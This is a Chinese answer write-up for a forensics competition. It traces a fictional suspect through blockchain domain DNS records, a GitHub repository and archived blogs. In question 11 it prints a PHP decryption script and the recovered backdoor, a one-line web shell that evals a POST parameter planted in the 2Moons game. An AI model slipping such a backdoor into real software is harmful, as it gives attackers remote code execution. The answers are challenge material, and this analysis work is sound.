1. 请分析检材二,找到李某上游人员陈某博客宣传所用域名为


结果:chen.foren6

2. 请分析陈某宣传所用域名,该域名的顶级域名在以下那个区块链注册

把1问中的域名给ai就得到答案了
结果:B

3. 请分析陈某宣传所用域名的顶级域名的域名解析服务器(DNS)共有几个

查询网站https://www.namebase.io,但要钱
结果:2

4. 请分析陈某宣传所用域名的顶级域名的NS1服务器ip为

方法同3题
结果:45.79.133.98

5. 请分析陈某宣传所用域名,该域名DNS记录指向邮件服务器域名为

命令:dig @45.79.133.98 chen.foren6 ANY

结果:mail.163.com

6. 请分析陈某宣传所用域名,该域名的txt记录中chen的值为


结果:fengbaoliejiu

7. 请分析陈某宣传所用域名,该域名DNS记录没有以下那个域名


4个选项,一条条的看
命令:dig ANY @ns1.varo.domains 选项域名




结果:c和d

8. 请分析陈某宣传所用域名,该博客域名最终DNS解析指向的github仓库名为

命令:dig CNAME @ns1.varo.domains blog.chen.foren6

结果:chewhaoN.github.io.

9. 请分析陈某github账号,陈某对jkroepke/2Moons项目增改了几个文件

结果:2

10. 请分析陈某github账号,陈某在修改2Moons过程中提到了什么锅底


找到url直接访问一下就得到答案了

结果:蜂蜜锅底

11. 请分析陈某github账号,陈某在游戏2Moons中放置的后门连接码的密码为

<?php
// 获取远程 CSS 文件内容, 并计算其 MD5 哈希作为 AES 密钥
// 需要配置才能访问外部资源, 这里用 python 先把资源下载到本地
//$cssContent = file_get_contents('https://foren6.atwebpages.com/woyao/eat/%E7%81%AB%E9%94%85/%E8%9C%82%E8%9C%9C%E9%94%85%E5%BA%95.css');
//open("./key.css", 'wb').write(requests.get("http://foren6.atwebpages.com/woyao/eat/%E7%81%AB%E9%94%85/%E8%9C%82%E8%9C%9C%E9%94%85%E5%BA%95.css").content)
$cssContent = file_get_contents('./key.css');
$aesKey = md5($cssContent, true);
echo base64_encode($aesKey);
echo "<br />";

// 读取本地加密的二进制文件
$encryptedData = file_get_contents('./encrypted.bin');
$base64DecodedData = base64_decode($encryptedData);

// AES-256-CBC解密准备
$cipherMethod = 'aes-256-cbc';
$ivLength = openssl_cipher_iv_length($cipherMethod);
$iv = substr($base64DecodedData, 0, $ivLength); // 提取IV(初始化向量)
$encryptedPayload = substr($base64DecodedData, $ivLength); // 剩余部分是加密数据

echo base64_encode($iv);
echo "<br />";

echo base64_encode($encryptedPayload);
echo "<br />";

// 解密数据(PHP代码)
$decryptedPhpCode = openssl_decrypt(
    $encryptedPayload,
    $cipherMethod,
    $aesKey,
    OPENSSL_RAW_DATA,
    $iv
);

echo $decryptedPhpCode;
>

这是上题的css文件

function yijuhua() {
    echo "Kangle) is OK! FICer is good!";
    eval($_POST[ficnb])
}
解密结果

结果:ficnb

12. 请访问陈某当前博客,陈某课程的扫码报名地址的域名为


扫码后域名就是大赛官网
结果:fic.forensix.cn

13. 请分析陈某当前博客,通过互联网找到陈某的旧博客网站标题为

查看前端代码

发现已经访问不了,通过web.archive.org查找该网页快照

这个网站查快照:https://web.archive.org/


结果:柳如烟大战霸天虎

14. 请分析陈某旧博客,陈某的姓名为

结果:陈浩北

15. 请分析陈某旧博客,陈某的邮箱地址为


结果:mailme@chen.foren6

16. 请分析陈某旧博客,陈某的11位手机号为

见上题
结果:13170010703

17. 请分析陈某旧博客,陈某最爱的dota英雄为


结果:邪影芳灵